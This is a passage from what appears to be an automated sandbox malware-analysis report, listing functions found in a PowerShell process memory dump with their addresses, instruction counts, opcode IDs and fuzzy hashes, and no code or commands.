                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5defffac4840a70290945e6cb72d5899c4c4bef99e58a5b50c618589bf0a5bb0
                                                                • Instruction ID: 1da18757f29fb782203433e9f346bc6a633520be0e101eba94cdabd82e657562
                                                                • Opcode Fuzzy Hash: 5defffac4840a70290945e6cb72d5899c4c4bef99e58a5b50c618589bf0a5bb0
                                                                • Instruction Fuzzy Hash: EBB17B74A00605DFDB04DF64C880AAEBBF2FF89305F588969D5099B3A1DB70EC46CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F70040, Relevance: .3, Instructions: 265COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c1dda2c5a204843b59377683bd69cc394c2a25c1ded8e8bcacb93c9e7f240a72
                                                                • Instruction ID: 51eb9429f51ca9414f48b82045b72e702646b4d062e1869044a3b71a3d422580
                                                                • Opcode Fuzzy Hash: c1dda2c5a204843b59377683bd69cc394c2a25c1ded8e8bcacb93c9e7f240a72
                                                                • Instruction Fuzzy Hash: 87B11875A00118CFCB14DFA8C584A9DBBB1FF48324F16819AD859AB362CB71EC42DF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F75A88, Relevance: .2, Instructions: 240COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ee5d15842d30bfcbe06182b4f0bf1172cdb5b39243cf7e72469716e49405c668
                                                                • Instruction ID: e2522a855e9c5829c8b534ca0a0ce7650f74848c78270bde5357f40cb0c78cb2
                                                                • Opcode Fuzzy Hash: ee5d15842d30bfcbe06182b4f0bf1172cdb5b39243cf7e72469716e49405c668
                                                                • Instruction Fuzzy Hash: 0F91B234B002089FDB04EBA4C854BEEBBF6EF89705F148469D50AEB390DB759D05DBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F793E0, Relevance: .2, Instructions: 237COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d403f3174266dd8835166f0cbf01a672311a39581749bb3764fa176783086890
                                                                • Instruction ID: dfabf7610bc0f1d340754150d0114810e6e2bffc66a9af5d315ca9e02a7bbd8c
                                                                • Opcode Fuzzy Hash: d403f3174266dd8835166f0cbf01a672311a39581749bb3764fa176783086890
                                                                • Instruction Fuzzy Hash: 8D819135B042149FCB18DBB5D854AAEBBF6EF89314F18846AD506DB3A0DF709C05CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F70448, Relevance: .2, Instructions: 237COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4522f16034cfdd2d974006ea6b85be1bb8401f0aabe86389eb980e7948b16de1
                                                                • Instruction ID: 7fb2dfc7a66269741061c64e4bc44439877154870a59494457e8a9b9797e0ebe
                                                                • Opcode Fuzzy Hash: 4522f16034cfdd2d974006ea6b85be1bb8401f0aabe86389eb980e7948b16de1
                                                                • Instruction Fuzzy Hash: 4291F834B00208CFCB14CB68C490A9EB7F6BF8D324B19855AE559EB351DB34EC419FA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F753EF, Relevance: .2, Instructions: 231COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6288b6cb59a5fbc0af8ed5734b03b38c7cb6a4ab4c148de90ff806bc39673678
                                                                • Instruction ID: f538879a31713b141f5820b38392d4fe3f62a559fe34634799e4235a81f9f101
                                                                • Opcode Fuzzy Hash: 6288b6cb59a5fbc0af8ed5734b03b38c7cb6a4ab4c148de90ff806bc39673678
                                                                • Instruction Fuzzy Hash: 0BA16974A00605DFDB14DF64C980A9EBBF2FF88305F588969D5099B361DB70EC46CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F74EC1, Relevance: .2, Instructions: 223COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 87266946b56dbab38dfdaf68417847497816fda8e5b536b8996fb6ea471cf157
                                                                • Instruction ID: ae78205d7c0d487bd7bdec33fd154467aa91da9ae0ca685927e60d197598fd55
                                                                • Opcode Fuzzy Hash: 87266946b56dbab38dfdaf68417847497816fda8e5b536b8996fb6ea471cf157
                                                                • Instruction Fuzzy Hash: B5917B78A00601DFCB05CF64C984EAABBF2FF8D304B148559E9198B762DB71EC51DB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F77FE8, Relevance: .2, Instructions: 215COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dad23652c3e282aa28969e83a3dad3a8e719bc218c3cbd51e2459be5322d2197
                                                                • Instruction ID: 579b67888b2255d674d3e9791063a3e62e4c70b660d678a7557bc294d4ce8b70
                                                                • Opcode Fuzzy Hash: dad23652c3e282aa28969e83a3dad3a8e719bc218c3cbd51e2459be5322d2197
                                                                • Instruction Fuzzy Hash: E7816B35B006049FDB54DF64D898AAEB7F6FF89311F148469E906EB390DB30DC068B61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F74646, Relevance: .2, Instructions: 212COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 840c43df1f5c63de20386bcb4c22c431590a70d11018d78ad2248df8ee7ad597
                                                                • Instruction ID: 9fe710132eceee29a0b029540787daf87fa4284488838d2fad6e536eacecf7db
                                                                • Opcode Fuzzy Hash: 840c43df1f5c63de20386bcb4c22c431590a70d11018d78ad2248df8ee7ad597
                                                                • Instruction Fuzzy Hash: EC913A74A00218CFDB25DF54C894B99B7B2FF88314F1581A9D9099B3A1CB74ED81DF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F74EE0, Relevance: .2, Instructions: 208COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6d76f9701ad1a154d55df721e02cf4c1b042a8cec724af96608dda76d925ae7b
                                                                • Instruction ID: c9c19b62e5c3748249427f01b5b8b74415dd956e4a388a150f5804eceb08cce1
                                                                • Opcode Fuzzy Hash: 6d76f9701ad1a154d55df721e02cf4c1b042a8cec724af96608dda76d925ae7b
                                                                • Instruction Fuzzy Hash: 56917978A00601DFCB05CF64C984E6ABBF2FF8D304B148569E91A8B762DB71EC51DB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F79000, Relevance: .2, Instructions: 206COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52610f1d3b621c7d7226564c8a2b8ce6955d5821a92be8138eb2dff140721e9c
                                                                • Instruction ID: 15e4871b5146cd955f96ea0598c4bed203d3c566c1efa8f7de0eae7d30439281
                                                                • Opcode Fuzzy Hash: 52610f1d3b621c7d7226564c8a2b8ce6955d5821a92be8138eb2dff140721e9c
                                                                • Instruction Fuzzy Hash: 5C811A35A04209DFDB44DFA8D484BADBBB6FB88320F18C066E809AB355D771DC41DB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F74908, Relevance: .2, Instructions: 206COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9088c9e87a80c6778b76c2bf3887e43152be303732028dcf7559f8e82c196540
                                                                • Instruction ID: f24e83553e94339d5b6c60849ac37758668acc9948d5fac6ac8a905e5e3de0f6
                                                                • Opcode Fuzzy Hash: 9088c9e87a80c6778b76c2bf3887e43152be303732028dcf7559f8e82c196540
                                                                • Instruction Fuzzy Hash: 25913A34A00218DFDB25DF54C894B99B7B2FF88314F1581A9E9099B361CB74ED81DF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F751B0, Relevance: .2, Instructions: 180COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1ab9ad163eaa0fe065c32d7066ed9357eb67bd7d843933420832ad056b23e490
                                                                • Instruction ID: f6d8219dcb852a4a87ec4feeb6c0625a18a28ef2e09f8ee9799c998fbe87127a
                                                                • Opcode Fuzzy Hash: 1ab9ad163eaa0fe065c32d7066ed9357eb67bd7d843933420832ad056b23e490
                                                                • Instruction Fuzzy Hash: 4A61D634A006059FDB40DF64D840AAEBBB6EF89741F20816ED90AAB390DB75DD42CF61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F78B80, Relevance: .2, Instructions: 159COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7df442698c8dd88ab19a2d3d9fdb0fd8de5fcccd6223c7e2d8f814a6ad45de00
                                                                • Instruction ID: 04ad4ae12d7801e3032cf9d1f0551c290841981a5972c823bd98d66fa2660de7
                                                                • Opcode Fuzzy Hash: 7df442698c8dd88ab19a2d3d9fdb0fd8de5fcccd6223c7e2d8f814a6ad45de00
                                                                • Instruction Fuzzy Hash: FA511775B002049FC754DF68C498A6AB7F2FF8C365B14846AE90ADB361DB71EC42CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F75D45, Relevance: .1, Instructions: 140COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d88f6720f578fcfe15158ee27670c5e6496af8f2c7c30d068a6881c832fcfae6
                                                                • Instruction ID: 4b3741d9a411259d8ec8d84a60fcf0816ae6926bbe16e1ca3bd71ce82fd7220a
                                                                • Opcode Fuzzy Hash: d88f6720f578fcfe15158ee27670c5e6496af8f2c7c30d068a6881c832fcfae6
                                                                • Instruction Fuzzy Hash: 5751D638A042049FDB14EFA4D858BAE7BF6EF89711F14846AE509EB290DB709C44DB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F793D0, Relevance: .1, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ba17627a19d4be585d36d7b9152ee54ef6a203d4c178ba92c9fa6f68fa08f596
                                                                • Instruction ID: 16a5cbe6c2eef648e35aba85436a8c7146a0081cad5841b36fd177ab2fff5394
                                                                • Opcode Fuzzy Hash: ba17627a19d4be585d36d7b9152ee54ef6a203d4c178ba92c9fa6f68fa08f596
                                                                • Instruction Fuzzy Hash: E3518D71A04218DFDB19DF64D894BAEB7F2EF88310F188469E5069B260DFB0EC05DB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7A859, Relevance: .1, Instructions: 119COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9fa2785d30c61015db888dc0643627598ec864b5f78385df1949d37330af2b90
                                                                • Instruction ID: dc5e0ab68d9b066b62de4f8fb7ece6f54bcda1a942083477ebdba9ec19480f52
                                                                • Opcode Fuzzy Hash: 9fa2785d30c61015db888dc0643627598ec864b5f78385df1949d37330af2b90
                                                                • Instruction Fuzzy Hash: 4C418B78601340DFCB54EB78E45879DBBF6EB8E215F20856CE506EB380EB359842CB65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F74A59, Relevance: .1, Instructions: 118COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9ad59b64850dc0092f8653c699739e01a8b279880e06cf4b0005f384c17d3256
                                                                • Instruction ID: 835eb7966feabbfffeeb8735b3addf6ea29581d2b1d77f69ffc9570377095cbb
                                                                • Opcode Fuzzy Hash: 9ad59b64850dc0092f8653c699739e01a8b279880e06cf4b0005f384c17d3256
                                                                • Instruction Fuzzy Hash: 83513D34A00224CFDB25DF64D894B99B7B2BF49314F2481E9D909AB390DB34ED81CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7ACD8, Relevance: .1, Instructions: 117COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e9697f247cac6a1689bb9bd4a1ceb9b23dddaa73416c03d3d4e50d86d39a1ddc
                                                                • Instruction ID: 34b7915d27f439334c2f9c67060aefbb97dc64d44475c4dd3c67fafcc836f94f
                                                                • Opcode Fuzzy Hash: e9697f247cac6a1689bb9bd4a1ceb9b23dddaa73416c03d3d4e50d86d39a1ddc
                                                                • Instruction Fuzzy Hash: A241E470A007548FDB24CF29C80069EBBF2FF88310F158A6ED499AB751C730A845CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7FE68, Relevance: .1, Instructions: 114COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 072d3a63cb096dcb04ec977cc9c1b6afb76e853123324c70664e2c82b98fb9e4
                                                                • Instruction ID: 912eb612fbfee45e735ba7a5ca3af86acf73d6a53ea5f90c991ffc1da4068cea
                                                                • Opcode Fuzzy Hash: 072d3a63cb096dcb04ec977cc9c1b6afb76e853123324c70664e2c82b98fb9e4
                                                                • Instruction Fuzzy Hash: 7941A334A046449FCB14DF6CC484DAEBBB1EF89320B14856ED90ADB3A2CB31EC45CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7A868, Relevance: .1, Instructions: 112COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 814981ae8cd91d9b7d3c5d26edaca04fcf9ab86bd14356f9f5ce3af03f5c044a
                                                                • Instruction ID: 821a8d30fecc4b86afcfcff16e096c92c114afa972884815b7ce75cccbc2a78a
                                                                • Opcode Fuzzy Hash: 814981ae8cd91d9b7d3c5d26edaca04fcf9ab86bd14356f9f5ce3af03f5c044a
                                                                • Instruction Fuzzy Hash: 84414C78601304DFCB54EB78E45879DBBF6EB8D305F60846DE506EB380EB3598418B65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F72CB7, Relevance: .1, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 07f75494474da7bf1efce9e1dd8f99f51df626be4d968e510a7d7c9ac2ef4c9c
                                                                • Instruction ID: 6c241117256a06d9ee9fe7a9ddb38feeac4ca298d0078dea6faf83e62c66b901
                                                                • Opcode Fuzzy Hash: 07f75494474da7bf1efce9e1dd8f99f51df626be4d968e510a7d7c9ac2ef4c9c
                                                                • Instruction Fuzzy Hash: BA415974A002059FCB19CF99C594EAEFBB1FF48320B2581AAD905AB361C731FD51CBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F795DE, Relevance: .1, Instructions: 104COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7bafa99435b46feb851792d947b63465d09cfba7eb3a7ec367e94bafde219dfb
                                                                • Instruction ID: 482aab735ce7abfa7c4279b2360bbcb07d3c7cf46de06bba8b4ebdfa313d8f94
                                                                • Opcode Fuzzy Hash: 7bafa99435b46feb851792d947b63465d09cfba7eb3a7ec367e94bafde219dfb
                                                                • Instruction Fuzzy Hash: F3318F35B042149FCB18AB79C868A7E7AF6EF8D704F15446AD406DB3A1CF758C058BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F78B6A, Relevance: .1, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b5de12da193d5a13ca17e8e0a78162a79ded37c87cad8a36ed60231d93b5a681
                                                                • Instruction ID: 4f7e255d3ec745884379338f0610939bc3ffa66c64e77479bc326f015a92b1f3
                                                                • Opcode Fuzzy Hash: b5de12da193d5a13ca17e8e0a78162a79ded37c87cad8a36ed60231d93b5a681
                                                                • Instruction Fuzzy Hash: 5F418F75A00204DFC755CF68C848E9ABBF1FF89360F18849AE9499B391DB31EC42DB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7F840, Relevance: .1, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42c9048bb9dd82959945444f3e84108f8e74836cefd0e3e05b2f7d5d1beef147
                                                                • Instruction ID: 11d9344e41117633a7475e09dc7c521984513c6020e0406631f52bacb2dc7157
                                                                • Opcode Fuzzy Hash: 42c9048bb9dd82959945444f3e84108f8e74836cefd0e3e05b2f7d5d1beef147
                                                                • Instruction Fuzzy Hash: 51317C39704A16DFC714EB2ED880B2A77F1AB493217548466E9DACB760DB34EC45AB03
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F798C8, Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 18ac5f6b1df98f05fcb46992c08f6ce0457551b7e7eef8e4b22406da8bf1e0cf
                                                                • Instruction ID: 42a15d7f6d7fa817484f8281037ec2273d2f4d161aae7a588b95cc48f78c5593
                                                                • Opcode Fuzzy Hash: 18ac5f6b1df98f05fcb46992c08f6ce0457551b7e7eef8e4b22406da8bf1e0cf
                                                                • Instruction Fuzzy Hash: 3B317035B002059BDB08DFA9D454AAEBBF6FB8D310F14C82AD916E7344DB719C01DBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7AA28, Relevance: .1, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c8199c4a9a42a728ced98e600b22eca22260e744ee83acfe2e9ddce1b59e42a8
                                                                • Instruction ID: 590ba2a2049c23dfcddcc4a1db079166cc89bba171442f9b4367dc7240f62e02
                                                                • Opcode Fuzzy Hash: c8199c4a9a42a728ced98e600b22eca22260e744ee83acfe2e9ddce1b59e42a8
                                                                • Instruction Fuzzy Hash: 19313C75600218DBDB58DFA4C854BEE77B2EF89301F218479D106BB390CB399842DBA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F760A9, Relevance: .1, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 07042c147e9fd423ca9d3fde962a9cc0d704c71daf1498d4220f3f1a04cd0fae
                                                                • Instruction ID: f3ebd3a2bf650ddfbf89781f88a2bf713dbf754fa73a01241f1d27a6d0cae402
                                                                • Opcode Fuzzy Hash: 07042c147e9fd423ca9d3fde962a9cc0d704c71daf1498d4220f3f1a04cd0fae
                                                                • Instruction Fuzzy Hash: AB318D356006008FCB04DB68C854B98B7B6FF8C319F2584A9E60ADB3B1CB71EC46CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7CA08, Relevance: .1, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a87bb215612a523e9951ff7c46943b9a71ee80195db822bcd2fe89a42d3bb80c
                                                                • Instruction ID: 4afe6333b99664e2e343cd85f72984a1495b3942f6c0c7d20317608ae58d1793
                                                                • Opcode Fuzzy Hash: a87bb215612a523e9951ff7c46943b9a71ee80195db822bcd2fe89a42d3bb80c
                                                                • Instruction Fuzzy Hash: D42137317042559FD315DB2DE420A5ABBA9EFC6322B05C0BBE40DCB652DB28DC02C7E2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F7BE18, Relevance: .1, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5e46c568b7a0bc7774b4a54c9f39e89ee41dac2ecf0850364256670b14050f0c
                                                                • Instruction ID: 9d2d268d182acb9a77223ccf08c939719a10cc11a38017ba42ce4af63fae4568
                                                                • Opcode Fuzzy Hash: 5e46c568b7a0bc7774b4a54c9f39e89ee41dac2ecf0850364256670b14050f0c
                                                                • Instruction Fuzzy Hash: 6521FF317086248FD72667749810BAE77999F8B369F15C8AED60ACF781DF29CC019392
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F77698, Relevance: .1, Instructions: 78COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.476265336.0000000000F70000.00000040.00000001.sdmp, Offset: 00F70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_f70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8db7b01916b2a04b6766ddb959b78bd22d6f1cfba3d25af9147fe36ebc74fcd
                                                                • Instruction ID: b6657b723ac978ae44387f438765e745c1fbf8523e40453f6253ad0da9318d8d
                                                                • Opcode Fuzzy Hash: e8db7b01916b2a04b6766ddb959b78bd22d6f1cfba3d25af9147fe36ebc74fcd
                                                                • Instruction Fuzzy Hash: D321D234210755DFC700EF28D890D9A7BE2EF89208B48CD6AE5468F361CB70EC09CB92
                                                                Uniqueness

